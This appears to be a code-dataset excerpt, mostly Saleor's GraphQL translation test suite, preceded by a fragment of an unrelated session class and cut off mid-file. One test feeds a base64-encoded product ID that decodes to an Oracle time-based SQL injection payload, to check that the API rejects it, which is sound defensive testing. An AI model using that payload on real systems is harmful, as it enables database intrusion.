req = self.session.get("https://tbgforums.com/forums/index.php")
self.uID = parsers.default.get_element_by_id(req.text, "navprofile")
self.uID = int(re.findall(r'profile\.php\?id=(\d*)', self.uID)[0])
self.get_user(self.uID)
__all__ = ["TBGSession"]
| 34.893333 | 113 | 0.588651 |
f6481be500ce0da1a534a178ffff372c5b1a1aa3 | 106,790 | py | Python | saleor/graphql/translations/tests/test_translations.py | eanknd/saleor | 08aa724176be00d7aaf654f14e9ae99dd4327f97 | [
"CC-BY-4.0"
] | 1,392 | 2021-10-06T15:54:28.000Z | 2022-03-31T20:50:55.000Z | saleor/graphql/translations/tests/test_translations.py | eanknd/saleor | 08aa724176be00d7aaf654f14e9ae99dd4327f97 | [
"CC-BY-4.0"
] | 888 | 2021-10-06T10:48:54.000Z | 2022-03-31T11:00:30.000Z | saleor/graphql/translations/tests/test_translations.py | eanknd/saleor | 08aa724176be00d7aaf654f14e9ae99dd4327f97 | [
"CC-BY-4.0"
] | 538 | 2021-10-07T16:21:27.000Z | 2022-03-31T22:58:57.000Z | import json
from unittest.mock import patch
import graphene
import pytest
from django.contrib.auth.models import Permission
from django.utils.functional import SimpleLazyObject
from freezegun import freeze_time
from ....tests.utils import dummy_editorjs
from ....webhook.event_types import WebhookEventAsyncType
from ....webhook.payloads import generate_translation_payload
from ...core.enums import LanguageCodeEnum
from ...tests.utils import assert_no_permission, get_graphql_content
from ..schema import TranslatableKinds
def test_product_translation(user_api_client, product, channel_USD):
description = dummy_editorjs("test desription")
product.translations.create(
language_code="pl", name="Produkt", description=description
)
query = """
query productById($productId: ID!, $channel: String) {
product(id: $productId, channel: $channel) {
translation(languageCode: PL) {
name
description
descriptionJson
language {
code
}
}
}
}
"""
product_id = graphene.Node.to_global_id("Product", product.id)
response = user_api_client.post_graphql(
query, {"productId": product_id, "channel": channel_USD.slug}
)
data = get_graphql_content(response)["data"]
translation_data = data["product"]["translation"]
assert translation_data["name"] == "Produkt"
assert translation_data["language"]["code"] == "PL"
assert (
translation_data["description"]
== translation_data["descriptionJson"]
== dummy_editorjs("test desription", json_format=True)
)
def test_product_translation_without_description(user_api_client, product, channel_USD):
product.translations.create(language_code="pl", name="Produkt")
query = """
query productById($productId: ID!, $channel: String) {
product(id: $productId, channel: $channel) {
translation(languageCode: PL) {
name
description
descriptionJson
language {
code
}
}
}
}
"""
product_id = graphene.Node.to_global_id("Product", product.id)
response = user_api_client.post_graphql(
query, {"productId": product_id, "channel": channel_USD.slug}
)
data = get_graphql_content(response)["data"]
translation_data = data["product"]["translation"]
assert translation_data["name"] == "Produkt"
assert translation_data["language"]["code"] == "PL"
assert translation_data["description"] is None
assert translation_data["descriptionJson"] == "{}"
def test_product_translation_with_app(app_api_client, product, channel_USD):
product.translations.create(language_code="pl", name="Produkt")
query = """
query productById($productId: ID!, $channel: String) {
product(id: $productId, channel: $channel) {
translation(languageCode: PL) {
name
language {
code
}
}
}
}
"""
product_id = graphene.Node.to_global_id("Product", product.id)
response = app_api_client.post_graphql(
query, {"productId": product_id, "channel": channel_USD.slug}
)
data = get_graphql_content(response)["data"]
assert data["product"]["translation"]["name"] == "Produkt"
assert data["product"]["translation"]["language"]["code"] == "PL"
def test_product_variant_translation(user_api_client, variant, channel_USD):
variant.translations.create(language_code="pl", name="Wariant")
query = """
query productVariantById($productVariantId: ID!, $channel: String) {
productVariant(id: $productVariantId, channel: $channel) {
translation(languageCode: PL) {
name
language {
code
}
}
}
}
"""
product_variant_id = graphene.Node.to_global_id("ProductVariant", variant.id)
response = user_api_client.post_graphql(
query, {"productVariantId": product_variant_id, "channel": channel_USD.slug}
)
data = get_graphql_content(response)["data"]
assert data["productVariant"]["translation"]["name"] == "Wariant"
assert data["productVariant"]["translation"]["language"]["code"] == "PL"
def test_collection_translation(user_api_client, published_collection, channel_USD):
description = dummy_editorjs("test desription")
published_collection.translations.create(
language_code="pl", name="Kolekcja", description=description
)
query = """
query collectionById($collectionId: ID!, $channel: String) {
collection(id: $collectionId, channel: $channel) {
translation(languageCode: PL) {
name
description
descriptionJson
language {
code
}
}
}
}
"""
collection_id = graphene.Node.to_global_id("Collection", published_collection.id)
variables = {"collectionId": collection_id, "channel": channel_USD.slug}
response = user_api_client.post_graphql(query, variables)
data = get_graphql_content(response)["data"]
translation_data = data["collection"]["translation"]
assert translation_data["name"] == "Kolekcja"
assert translation_data["language"]["code"] == "PL"
assert (
translation_data["description"]
== translation_data["descriptionJson"]
== dummy_editorjs("test desription", json_format=True)
)
def test_collection_translation_without_description(
user_api_client, published_collection, channel_USD
):
published_collection.translations.create(language_code="pl", name="Kolekcja")
query = """
query collectionById($collectionId: ID!, $channel: String) {
collection(id: $collectionId, channel: $channel) {
translation(languageCode: PL) {
name
description
descriptionJson
language {
code
}
}
}
}
"""
collection_id = graphene.Node.to_global_id("Collection", published_collection.id)
variables = {"collectionId": collection_id, "channel": channel_USD.slug}
response = user_api_client.post_graphql(query, variables)
data = get_graphql_content(response)["data"]
translation_data = data["collection"]["translation"]
assert translation_data["name"] == "Kolekcja"
assert translation_data["language"]["code"] == "PL"
assert translation_data["description"] is None
assert translation_data["descriptionJson"] == "{}"
def test_category_translation(user_api_client, category):
description = dummy_editorjs("test description")
category.translations.create(
language_code="pl", name="Kategoria", description=description
)
query = """
query categoryById($categoryId: ID!) {
category(id: $categoryId) {
translation(languageCode: PL) {
name
description
descriptionJson
language {
code
}
}
}
}
"""
category_id = graphene.Node.to_global_id("Category", category.id)
response = user_api_client.post_graphql(query, {"categoryId": category_id})
data = get_graphql_content(response)["data"]
translation_data = data["category"]["translation"]
assert translation_data["name"] == "Kategoria"
assert translation_data["language"]["code"] == "PL"
assert (
translation_data["description"]
== translation_data["descriptionJson"]
== dummy_editorjs("test description", json_format=True)
)
def test_category_translation_without_description(user_api_client, category):
category.translations.create(language_code="pl", name="Kategoria")
query = """
query categoryById($categoryId: ID!) {
category(id: $categoryId) {
translation(languageCode: PL) {
name
description
descriptionJson
language {
code
}
}
}
}
"""
category_id = graphene.Node.to_global_id("Category", category.id)
response = user_api_client.post_graphql(query, {"categoryId": category_id})
data = get_graphql_content(response)["data"]
translation_data = data["category"]["translation"]
assert translation_data["name"] == "Kategoria"
assert translation_data["language"]["code"] == "PL"
assert translation_data["description"] is None
assert translation_data["descriptionJson"] == "{}"
def test_voucher_translation(staff_api_client, voucher, permission_manage_discounts):
voucher.translations.create(language_code="pl", name="Bon")
query = """
query voucherById($voucherId: ID!) {
voucher(id: $voucherId) {
translation(languageCode: PL) {
name
language {
code
}
}
}
}
"""
voucher_id = graphene.Node.to_global_id("Voucher", voucher.id)
response = staff_api_client.post_graphql(
query, {"voucherId": voucher_id}, permissions=[permission_manage_discounts]
)
data = get_graphql_content(response)["data"]
assert data["voucher"]["translation"]["name"] == "Bon"
assert data["voucher"]["translation"]["language"]["code"] == "PL"
def test_sale_translation(staff_api_client, sale, permission_manage_discounts):
sale.translations.create(language_code="pl", name="Wyprz")
query = """
query saleById($saleId: ID!) {
sale(id: $saleId) {
translation(languageCode: PL) {
name
language {
code
}
}
}
}
"""
sale_id = graphene.Node.to_global_id("Sale", sale.id)
response = staff_api_client.post_graphql(
query, {"saleId": sale_id}, permissions=[permission_manage_discounts]
)
data = get_graphql_content(response)["data"]
assert data["sale"]["translation"]["name"] == "Wyprz"
assert data["sale"]["translation"]["language"]["code"] == "PL"
def test_page_translation(user_api_client, page):
content = dummy_editorjs("test content")
page.translations.create(language_code="pl", title="Strona", content=content)
query = """
query pageById($pageId: ID!) {
page(id: $pageId) {
translation(languageCode: PL) {
title
content
contentJson
language {
code
}
}
}
}
"""
page_id = graphene.Node.to_global_id("Page", page.id)
response = user_api_client.post_graphql(query, {"pageId": page_id})
data = get_graphql_content(response)["data"]
translation_data = data["page"]["translation"]
assert translation_data["title"] == "Strona"
assert translation_data["language"]["code"] == "PL"
assert (
translation_data["content"]
== translation_data["contentJson"]
== dummy_editorjs("test content", json_format=True)
)
def test_page_translation_without_content(user_api_client, page):
page.translations.create(language_code="pl", title="Strona")
query = """
query pageById($pageId: ID!) {
page(id: $pageId) {
translation(languageCode: PL) {
title
content
contentJson
language {
code
}
}
}
}
"""
page_id = graphene.Node.to_global_id("Page", page.id)
response = user_api_client.post_graphql(query, {"pageId": page_id})
data = get_graphql_content(response)["data"]
translation_data = data["page"]["translation"]
assert translation_data["title"] == "Strona"
assert translation_data["language"]["code"] == "PL"
assert translation_data["content"] is None
assert translation_data["contentJson"] == "{}"
def test_attribute_translation(user_api_client, color_attribute):
color_attribute.translations.create(language_code="pl", name="Kolor")
query = """
query {
attributes(first: 1) {
edges {
node {
translation(languageCode: PL) {
name
language {
code
}
}
}
}
}
}
"""
response = user_api_client.post_graphql(query)
data = get_graphql_content(response)["data"]
attribute = data["attributes"]["edges"][0]["node"]
assert attribute["translation"]["name"] == "Kolor"
assert attribute["translation"]["language"]["code"] == "PL"
def test_attribute_value_translation(user_api_client, pink_attribute_value):
pink_attribute_value.translations.create(
language_code="pl", name="Różowy", rich_text=dummy_editorjs("Pink")
)
query = """
query {
attributes(first: 1) {
edges {
node {
choices(first: 10) {
edges {
node {
translation(languageCode: PL) {
name
richText
language {
code
}
}
}
}
}
}
}
}
}
"""
attribute_value_id = graphene.Node.to_global_id(
"AttributeValue", pink_attribute_value.id
)
response = user_api_client.post_graphql(
query, {"attributeValueId": attribute_value_id}
)
data = get_graphql_content(response)["data"]
attribute_value = data["attributes"]["edges"][0]["node"]["choices"]["edges"][-1][
"node"
]
assert attribute_value["translation"]["name"] == "Różowy"
assert attribute_value["translation"]["richText"] == json.dumps(
dummy_editorjs("Pink")
)
assert attribute_value["translation"]["language"]["code"] == "PL"
def test_shipping_method_translation(
staff_api_client, shipping_method, permission_manage_shipping
):
shipping_method.translations.create(language_code="pl", name="DHL Polska")
query = """
query shippingZoneById($shippingZoneId: ID!) {
shippingZone(id: $shippingZoneId) {
shippingMethods {
translation(languageCode: PL) {
name
language {
code
}
}
}
}
}
"""
shipping_zone_id = graphene.Node.to_global_id(
"ShippingZone", shipping_method.shipping_zone.id
)
response = staff_api_client.post_graphql(
query,
{"shippingZoneId": shipping_zone_id},
permissions=[permission_manage_shipping],
)
data = get_graphql_content(response)["data"]
shipping_method = data["shippingZone"]["shippingMethods"][-1]
assert shipping_method["translation"]["name"] == "DHL Polska"
assert shipping_method["translation"]["language"]["code"] == "PL"
def test_menu_item_translation(user_api_client, menu_item):
menu_item.translations.create(language_code="pl", name="Odnośnik 1")
query = """
query menuItemById($menuItemId: ID!) {
menuItem(id: $menuItemId) {
translation(languageCode: PL) {
name
language {
code
}
}
}
}
"""
menu_item_id = graphene.Node.to_global_id("MenuItem", menu_item.id)
response = user_api_client.post_graphql(query, {"menuItemId": menu_item_id})
data = get_graphql_content(response)["data"]
assert data["menuItem"]["translation"]["name"] == "Odnośnik 1"
assert data["menuItem"]["translation"]["language"]["code"] == "PL"
def test_shop_translation(user_api_client, site_settings):
site_settings.translations.create(language_code="pl", header_text="Nagłówek")
query = """
query {
shop {
translation(languageCode: PL) {
headerText
language {
code
}
}
}
}
"""
response = user_api_client.post_graphql(query)
data = get_graphql_content(response)["data"]
assert data["shop"]["translation"]["headerText"] == "Nagłówek"
assert data["shop"]["translation"]["language"]["code"] == "PL"
def test_product_no_translation(user_api_client, product, channel_USD):
query = """
query productById($productId: ID!, $channel: String) {
product(id: $productId, channel: $channel) {
translation(languageCode: PL) {
name
language {
code
}
}
}
}
"""
product_id = graphene.Node.to_global_id("Product", product.id)
response = user_api_client.post_graphql(
query, {"productId": product_id, "channel": channel_USD.slug}
)
data = get_graphql_content(response)["data"]
assert data["product"]["translation"] is None
def test_product_variant_no_translation(user_api_client, variant, channel_USD):
query = """
query productVariantById($productVariantId: ID!, $channel: String) {
productVariant(id: $productVariantId, channel: $channel) {
translation(languageCode: PL) {
name
language {
code
}
}
}
}
"""
product_variant_id = graphene.Node.to_global_id("ProductVariant", variant.id)
response = user_api_client.post_graphql(
query, {"productVariantId": product_variant_id, "channel": channel_USD.slug}
)
data = get_graphql_content(response)["data"]
assert data["productVariant"]["translation"] is None
def test_collection_no_translation(user_api_client, published_collection, channel_USD):
query = """
query collectionById($collectionId: ID!, $channel: String) {
collection(id: $collectionId, channel: $channel) {
translation(languageCode: PL) {
name
language {
code
}
}
}
}
"""
collection_id = graphene.Node.to_global_id("Collection", published_collection.id)
variables = {"collectionId": collection_id, "channel": channel_USD.slug}
response = user_api_client.post_graphql(query, variables)
data = get_graphql_content(response)["data"]
assert data["collection"]["translation"] is None
def test_category_no_translation(user_api_client, category):
query = """
query categoryById($categoryId: ID!) {
category(id: $categoryId) {
translation(languageCode: PL) {
name
language {
code
}
}
}
}
"""
category_id = graphene.Node.to_global_id("Category", category.id)
response = user_api_client.post_graphql(query, {"categoryId": category_id})
data = get_graphql_content(response)["data"]
assert data["category"]["translation"] is None
def test_voucher_no_translation(staff_api_client, voucher, permission_manage_discounts):
query = """
query voucherById($voucherId: ID!) {
voucher(id: $voucherId) {
translation(languageCode: PL) {
name
language {
code
}
}
}
}
"""
voucher_id = graphene.Node.to_global_id("Voucher", voucher.id)
response = staff_api_client.post_graphql(
query, {"voucherId": voucher_id}, permissions=[permission_manage_discounts]
)
data = get_graphql_content(response)["data"]
assert data["voucher"]["translation"] is None
def test_page_no_translation(user_api_client, page):
query = """
query pageById($pageId: ID!) {
page(id: $pageId) {
translation(languageCode: PL) {
title
language {
code
}
}
}
}
"""
page_id = graphene.Node.to_global_id("Page", page.id)
response = user_api_client.post_graphql(query, {"pageId": page_id})
data = get_graphql_content(response)["data"]
assert data["page"]["translation"] is None
def test_attribute_no_translation(user_api_client, color_attribute):
query = """
query {
attributes(first: 1) {
edges {
node {
translation(languageCode: PL) {
name
language {
code
}
}
}
}
}
}
"""
response = user_api_client.post_graphql(query)
data = get_graphql_content(response)["data"]
attribute = data["attributes"]["edges"][0]["node"]
assert attribute["translation"] is None
def test_attribute_value_no_translation(user_api_client, pink_attribute_value):
query = """
query {
attributes(first: 1) {
edges {
node {
choices(first: 10) {
edges {
node {
translation(languageCode: PL) {
name
language {
code
}
}
}
}
}
}
}
}
}
"""
attribute_value_id = graphene.Node.to_global_id(
"AttributeValue", pink_attribute_value.id
)
response = user_api_client.post_graphql(
query, {"attributeValueId": attribute_value_id}
)
data = get_graphql_content(response)["data"]
attribute_value = data["attributes"]["edges"][0]["node"]["choices"]["edges"][-1][
"node"
]
assert attribute_value["translation"] is None
def test_shipping_method_no_translation(
staff_api_client, shipping_method, permission_manage_shipping
):
query = """
query shippingZoneById($shippingZoneId: ID!) {
shippingZone(id: $shippingZoneId) {
shippingMethods {
translation(languageCode: PL) {
name
language {
code
}
}
}
}
}
"""
shipping_zone_id = graphene.Node.to_global_id(
"ShippingZone", shipping_method.shipping_zone.id
)
response = staff_api_client.post_graphql(
query,
{"shippingZoneId": shipping_zone_id},
permissions=[permission_manage_shipping],
)
data = get_graphql_content(response)["data"]
shipping_method = data["shippingZone"]["shippingMethods"][0]
assert shipping_method["translation"] is None
def test_menu_item_no_translation(user_api_client, menu_item):
query = """
query menuItemById($menuItemId: ID!) {
menuItem(id: $menuItemId) {
translation(languageCode: PL) {
name
language {
code
}
}
}
}
"""
menu_item_id = graphene.Node.to_global_id("MenuItem", menu_item.id)
response = user_api_client.post_graphql(query, {"menuItemId": menu_item_id})
data = get_graphql_content(response)["data"]
assert data["menuItem"]["translation"] is None
def test_shop_no_translation(user_api_client, site_settings):
query = """
query {
shop {
translation(languageCode: PL) {
headerText
language {
code
}
}
}
}
"""
response = user_api_client.post_graphql(query)
data = get_graphql_content(response)["data"]
assert data["shop"]["translation"] is None
PRODUCT_TRANSLATE_MUTATION = """
mutation productTranslate($productId: ID!, $input: TranslationInput!) {
productTranslate(id: $productId, languageCode: PL, input: $input) {
product {
translation(languageCode: PL) {
name
description
language {
code
}
}
}
errors {
field
code
}
}
}
"""
@freeze_time("1914-06-28 10:50")
@patch("saleor.plugins.webhook.plugin.get_webhooks_for_event")
@patch("saleor.plugins.webhook.plugin.trigger_webhooks_async")
def test_product_create_translation(
mocked_webhook_trigger,
mocked_get_webhooks_for_event,
any_webhook,
staff_api_client,
product,
permission_manage_translations,
settings,
):
mocked_get_webhooks_for_event.return_value = [any_webhook]
settings.PLUGINS = ["saleor.plugins.webhook.plugin.WebhookPlugin"]
product_id = graphene.Node.to_global_id("Product", product.id)
response = staff_api_client.post_graphql(
PRODUCT_TRANSLATE_MUTATION,
{"productId": product_id, "input": {"name": "Produkt PL"}},
permissions=[permission_manage_translations],
)
data = get_graphql_content(response)["data"]["productTranslate"]
assert data["product"]["translation"]["name"] == "Produkt PL"
assert data["product"]["translation"]["language"]["code"] == "PL"
translation = product.translations.first()
expected_payload = generate_translation_payload(translation, staff_api_client.user)
mocked_webhook_trigger.assert_called_once_with(
expected_payload,
WebhookEventAsyncType.TRANSLATION_CREATED,
[any_webhook],
translation,
SimpleLazyObject(lambda: staff_api_client.user),
)
def test_product_create_translation_for_description(
staff_api_client, product, permission_manage_translations
):
product_id = graphene.Node.to_global_id("Product", product.id)
description = dummy_editorjs("description", True)
variables = {"productId": product_id, "input": {"description": description}}
response = staff_api_client.post_graphql(
PRODUCT_TRANSLATE_MUTATION,
variables,
permissions=[permission_manage_translations],
)
data = get_graphql_content(response)["data"]["productTranslate"]
assert data["product"]["translation"]["name"] is None
assert data["product"]["translation"]["description"] == description
assert data["product"]["translation"]["language"]["code"] == "PL"
def test_product_create_translation_for_description_and_name_as_null(
staff_api_client, product, permission_manage_translations
):
product_id = graphene.Node.to_global_id("Product", product.id)
description = dummy_editorjs("description", True)
variables = {
"productId": product_id,
"input": {"description": description, "name": None},
}
response = staff_api_client.post_graphql(
PRODUCT_TRANSLATE_MUTATION,
variables,
permissions=[permission_manage_translations],
)
data = get_graphql_content(response)["data"]["productTranslate"]
assert data["product"]["translation"]["name"] is None
assert data["product"]["translation"]["description"] == description
assert data["product"]["translation"]["language"]["code"] == "PL"
def test_product_create_translation_with_app(
app_api_client, product, permission_manage_translations
):
product_id = graphene.Node.to_global_id("Product", product.id)
response = app_api_client.post_graphql(
PRODUCT_TRANSLATE_MUTATION,
{"productId": product_id, "input": {"name": "Produkt PL"}},
permissions=[permission_manage_translations],
)
data = get_graphql_content(response)["data"]["productTranslate"]
assert data["product"]["translation"]["name"] == "Produkt PL"
assert data["product"]["translation"]["language"]["code"] == "PL"
def test_product_create_translation_by_translatable_content_id(
staff_api_client, product, permission_manage_translations
):
translatable_content_id = graphene.Node.to_global_id(
"ProductTranslatableContent", product.id
)
response = staff_api_client.post_graphql(
PRODUCT_TRANSLATE_MUTATION,
{"productId": translatable_content_id, "input": {"name": "Produkt PL"}},
permissions=[permission_manage_translations],
)
data = get_graphql_content(response)["data"]["productTranslate"]
assert data["product"]["translation"]["name"] == "Produkt PL"
assert data["product"]["translation"]["language"]["code"] == "PL"
def test_product_create_translation_validates_name_length(
staff_api_client, product, permission_manage_translations
):
product_id = graphene.Node.to_global_id("Product", product.id)
variables = {
"productId": product_id,
"input": {"description": None, "name": "Long" * 100},
}
response = staff_api_client.post_graphql(
PRODUCT_TRANSLATE_MUTATION,
variables,
permissions=[permission_manage_translations],
)
data = get_graphql_content(response)["data"]["productTranslate"]
assert data["product"] is None
assert data["errors"] == [
{"field": "name", "code": "INVALID"},
]
def test_product_create_translation_by_invalid_translatable_content_id(
staff_api_client, product, permission_manage_translations
):
translatable_content_id = (
"UHJvZHVjdFRyYW5zbGF0YWJsZUNvbnRlbnQ6NDkxMyd8fERCTVN"
"fUElQRS5SRUNFSVZFX01FU1NBR0UoQ0hSKDk4KXx8Q0hSKDk4KXx8Q"
"0hSKDk4KSwxNSl8fA=="
)
# String decodes to
# ProductTranslatableContent:4913'||
# DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||
response = staff_api_client.post_graphql(
PRODUCT_TRANSLATE_MUTATION,
{"productId": translatable_content_id, "input": {"name": "Produkt PL"}},
permissions=[permission_manage_translations],
)
data = get_graphql_content(response)["data"]["productTranslate"]
errors = data["errors"][0]
assert errors["code"] == "INVALID"
assert errors["field"] == "id"
@freeze_time("1914-06-28 10:50")
@patch("saleor.plugins.webhook.plugin.get_webhooks_for_event")
@patch("saleor.plugins.webhook.plugin.trigger_webhooks_async")
def test_product_update_translation(
mocked_webhook_trigger,
mocked_get_webhooks_for_event,
any_webhook,
staff_api_client,
product,
permission_manage_translations,
settings,
):
mocked_get_webhooks_for_event.return_value = [any_webhook]
settings.PLUGINS = ["saleor.plugins.webhook.plugin.WebhookPlugin"]
translation = product.translations.create(language_code="pl", name="Produkt")
product_id = graphene.Node.to_global_id("Product", product.id)
response = staff_api_client.post_graphql(
PRODUCT_TRANSLATE_MUTATION,
{"productId": product_id, "input": {"name": "Produkt PL"}},
permissions=[permission_manage_translations],
)
data = get_graphql_content(response)["data"]["productTranslate"]
assert data["product"]["translation"]["name"] == "Produkt PL"
assert data["product"]["translation"]["language"]["code"] == "PL"
translation.refresh_from_db()
expected_payload = generate_translation_payload(translation, staff_api_client.user)
mocked_webhook_trigger.assert_called_once_with(
expected_payload,
WebhookEventAsyncType.TRANSLATION_UPDATED,
[any_webhook],
translation,
SimpleLazyObject(lambda: staff_api_client.user),
)
PRODUCT_VARIANT_TRANSLATE_MUTATION = """
mutation productVariantTranslate(
$productVariantId: ID!, $input: NameTranslationInput!
) {
productVariantTranslate(
id: $productVariantId, languageCode: PL,
input: $input) {
productVariant {
translation(languageCode: PL) {
name
language {
code
}
}
}
errors {
field
code
}
}
}
"""
@freeze_time("1914-06-28 10:50")
@patch("saleor.plugins.webhook.plugin.get_webhooks_for_event")
@patch("saleor.plugins.webhook.plugin.trigger_webhooks_async")
def test_product_variant_create_translation(
mocked_webhook_trigger,
mocked_get_webhooks_for_event,
any_webhook,
staff_api_client,
variant,
channel_USD,
permission_manage_translations,
settings,
):
mocked_get_webhooks_for_event.return_value = [any_webhook]
settings.PLUGINS = ["saleor.plugins.webhook.plugin.WebhookPlugin"]
product_variant_id = graphene.Node.to_global_id("ProductVariant", variant.id)
response = staff_api_client.post_graphql(
PRODUCT_VARIANT_TRANSLATE_MUTATION,
{"productVariantId": product_variant_id, "input": {"name": "Wariant PL"}},
permissions=[permission_manage_translations],
)
data = get_graphql_content(response)["data"]["productVariantTranslate"]
assert data["productVariant"]["translation"]["name"] == "Wariant PL"
assert data["productVariant"]["translation"]["language"]["code"] == "PL"
translation = variant.translations.first()
expected_payload = generate_translation_payload(translation, staff_api_client.user)
mocked_webhook_trigger.assert_called_with(
expected_payload,
WebhookEventAsyncType.TRANSLATION_CREATED,
[any_webhook],
translation,
SimpleLazyObject(lambda: staff_api_client.user),
)
def test_product_variant_create_translation_by_translatable_content_id(
staff_api_client,
variant,
channel_USD,
permission_manage_translations,
):
translatable_content_id = graphene.Node.to_global_id(
"ProductVariantTranslatableContent", variant.id
)
response = staff_api_client.post_graphql(
PRODUCT_VARIANT_TRANSLATE_MUTATION,
{"productVariantId": translatable_content_id, "input": {"name": "Wariant PL"}},
permissions=[permission_manage_translations],
)
data = get_graphql_content(response)["data"]["productVariantTranslate"]
assert data["productVariant"]["translation"]["name"] == "Wariant PL"
assert data["productVariant"]["translation"]["language"]["code"] == "PL"
@freeze_time("1914-06-28 10:50")
@patch("saleor.plugins.webhook.plugin.get_webhooks_for_event")
@patch("saleor.plugins.webhook.plugin.trigger_webhooks_async")
def test_product_variant_update_translation(
mocked_webhook_trigger,
mocked_get_webhooks_for_event,
any_webhook,
staff_api_client,
variant,
permission_manage_translations,
settings,
):
mocked_get_webhooks_for_event.return_value = [any_webhook]
settings.PLUGINS = ["saleor.plugins.webhook.plugin.WebhookPlugin"]
translation = variant.translations.create(language_code="pl", name="Wariant")
product_variant_id = graphene.Node.to_global_id("ProductVariant", variant.id)
response = staff_api_client.post_graphql(
PRODUCT_VARIANT_TRANSLATE_MUTATION,
{"productVariantId": product_variant_id, "input": {"name": "Wariant PL"}},
permissions=[permission_manage_translations],
)
data = get_graphql_content(response)["data"]["productVariantTranslate"]
assert data["productVariant"]["translation"]["name"] == "Wariant PL"
assert data["productVariant"]["translation"]["language"]["code"] == "PL"
translation.refresh_from_db()
expected_payload = generate_translation_payload(translation, staff_api_client.user)
mocked_webhook_trigger.assert_called_with(
expected_payload,
WebhookEventAsyncType.TRANSLATION_UPDATED,
[any_webhook],
translation,
SimpleLazyObject(lambda: staff_api_client.user),
)
def test_product_variant_translation_mutation_validates_inputs_length(
staff_api_client,
variant,
channel_USD,
permission_manage_translations,
):
translatable_content_id = graphene.Node.to_global_id(
"ProductVariantTranslatableContent", variant.id
)
response = staff_api_client.post_graphql(
PRODUCT_VARIANT_TRANSLATE_MUTATION,
{
"productVariantId": translatable_content_id,
"input": {"name": "Wariant PL" * 100},
},
permissions=[permission_manage_translations],
)
data = get_graphql_content(response)["data"]["productVariantTranslate"]
assert data["productVariant"] is None
assert data["errors"] == [
{
"field": "name",
"code": "INVALID",
}
]
COLLECTION_TRANSLATE_MUTATION = """
mutation collectionTranslate($collectionId: ID!, $input: TranslationInput!) {
collectionTranslate(
id: $collectionId, languageCode: PL,
input: $input) {
collection {
translation(languageCode: PL) {
name
description
language {
code
}
}
}
errors {
field
code
}
}
}
"""
@freeze_time("1914-06-28 10:50")
@patch("saleor.plugins.webhook.plugin.get_webhooks_for_event")
@patch("saleor.plugins.webhook.plugin.trigger_webhooks_async")
def test_collection_create_translation(
mocked_webhook_trigger,
mocked_get_webhooks_for_event,
any_webhook,
staff_api_client,
published_collection,
permission_manage_translations,
settings,
):
mocked_get_webhooks_for_event.return_value = [any_webhook]
settings.PLUGINS = ["saleor.plugins.webhook.plugin.WebhookPlugin"]
collection_id = graphene.Node.to_global_id("Collection", published_collection.id)
response = staff_api_client.post_graphql(
COLLECTION_TRANSLATE_MUTATION,
{"collectionId": collection_id, "input": {"name": "Kolekcja PL"}},
permissions=[permission_manage_translations],
)
data = get_graphql_content(response)["data"]["collectionTranslate"]
assert data["collection"]["translation"]["name"] == "Kolekcja PL"
assert data["collection"]["translation"]["language"]["code"] == "PL"
translation = published_collection.translations.first()
expected_payload = generate_translation_payload(translation, staff_api_client.user)
mocked_webhook_trigger.assert_called_once_with(
expected_payload,
WebhookEventAsyncType.TRANSLATION_CREATED,
[any_webhook],
translation,
SimpleLazyObject(lambda: staff_api_client.user),
)
def test_collection_create_translation_by_translatable_content_id(
staff_api_client,
published_collection,
permission_manage_translations,
):
translatable_content_id = graphene.Node.to_global_id(
"CollectionTranslatableContent", published_collection.id
)
response = staff_api_client.post_graphql(
COLLECTION_TRANSLATE_MUTATION,
{"collectionId": translatable_content_id, "input": {"name": "Kolekcja PL"}},
permissions=[permission_manage_translations],
)
data = get_graphql_content(response)["data"]["collectionTranslate"]
assert data["collection"]["translation"]["name"] == "Kolekcja PL"
assert data["collection"]["translation"]["language"]["code"] == "PL"
def test_collection_create_translation_for_description(
staff_api_client, published_collection, permission_manage_translations
):
collection_id = graphene.Node.to_global_id("Collection", published_collection.id)
description = dummy_editorjs("description", True)
response = staff_api_client.post_graphql(
COLLECTION_TRANSLATE_MUTATION,
{"collectionId": collection_id, "input": {"description": description}},
permissions=[permission_manage_translations],
)
data = get_graphql_content(response)["data"]["collectionTranslate"]
assert data["collection"]["translation"]["name"] is None
assert data["collection"]["translation"]["description"] == description
assert data["collection"]["translation"]["language"]["code"] == "PL"
def test_collection_create_translation_for_description_name_as_null(
staff_api_client, published_collection, permission_manage_translations
):
collection_id = graphene.Node.to_global_id("Collection", published_collection.id)
description = dummy_editorjs("description", True)
response = staff_api_client.post_graphql(
COLLECTION_TRANSLATE_MUTATION,
{
"collectionId": collection_id,
"input": {"description": description, "name": None},
},
permissions=[permission_manage_translations],
)
data = get_graphql_content(response)["data"]["collectionTranslate"]
assert data["collection"]["translation"]["name"] is None
assert data["collection"]["translation"]["description"] == description
assert data["collection"]["translation"]["language"]["code"] == "PL"
@freeze_time("1914-06-28 10:50")
@patch("saleor.plugins.webhook.plugin.get_webhooks_for_event")
@patch("saleor.plugins.webhook.plugin.trigger_webhooks_async")
def test_collection_update_translation(
mocked_webhook_trigger,
mocked_get_webhooks_for_event,
any_webhook,
staff_api_client,
published_collection,
permission_manage_translations,
settings,
):
mocked_get_webhooks_for_event.return_value = [any_webhook]
settings.PLUGINS = ["saleor.plugins.webhook.plugin.WebhookPlugin"]
translation = published_collection.translations.create(
language_code="pl", name="Kolekcja"
)
collection_id = graphene.Node.to_global_id("Collection", published_collection.id)
response = staff_api_client.post_graphql(
COLLECTION_TRANSLATE_MUTATION,
{"collectionId": collection_id, "input": {"name": "Kolekcja PL"}},
permissions=[permission_manage_translations],
)
data = get_graphql_content(response)["data"]["collectionTranslate"]
assert data["collection"]["translation"]["name"] == "Kolekcja PL"
assert data["collection"]["translation"]["language"]["code"] == "PL"
translation.refresh_from_db()
expected_payload = generate_translation_payload(translation, staff_api_client.user)
mocked_webhook_trigger.assert_called_once_with(
expected_payload,
WebhookEventAsyncType.TRANSLATION_UPDATED,
[any_webhook],
translation,
SimpleLazyObject(lambda: staff_api_client.user),
)
def test_collection_translation_mutation_validates_inputs_length(
staff_api_client, published_collection, permission_manage_translations
):
collection_id = graphene.Node.to_global_id("Collection", published_collection.id)
description = dummy_editorjs("description", True)
response = staff_api_client.post_graphql(
COLLECTION_TRANSLATE_MUTATION,
{
"collectionId": collection_id,
"input": {"description": description, "name": "long" * 100},
},
permissions=[permission_manage_translations],
)
data = get_graphql_content(response)["data"]["collectionTranslate"]
assert data["collection"] is None
assert data["errors"] == [{"field": "name", "code": "INVALID"}]
CATEGORY_TRANSLATE_MUTATION = """
